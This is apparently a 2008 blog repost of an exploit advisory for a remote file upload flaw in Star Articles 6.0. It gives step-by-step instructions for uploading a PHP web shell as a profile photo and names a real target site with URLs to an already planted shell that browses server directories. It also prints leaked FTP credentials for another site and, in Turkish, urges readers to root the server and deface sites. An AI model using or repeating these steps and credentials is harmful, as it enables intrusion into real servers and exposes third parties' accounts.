Star Articles 6.0 Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7251
Discovered By: ZoRLu
expl:
http://script//authorphoto/user_name[id].php
example:
http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bir cok site var. ya rootlayýn yada tek tek cakIn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;)
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bu serverdaki bir site icin:
ftp://ftp.ababy.com.au/ ( ftp pass ve username )
user: kiddybab
pass: KidEw1nk08
ne biliyim iste biseler yapmaya calIsIn amacIm yardImcı olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)
first register for site
after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )
click to gozat button and select your shell after upload you shell
more after go repat edit profile page and you look you photo. right click to you photo
select to properties copy photo link and paste you explorer.
go your shell
examp:
user: trt-turk@hotmail.com
passwd: zorlu1
login:
http://www.lcfarticles.com/user.login.php
shell:
http://www.lcfarticles.com//authorphoto/zorlu40.php
28 Kasım 2008 Cuma
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder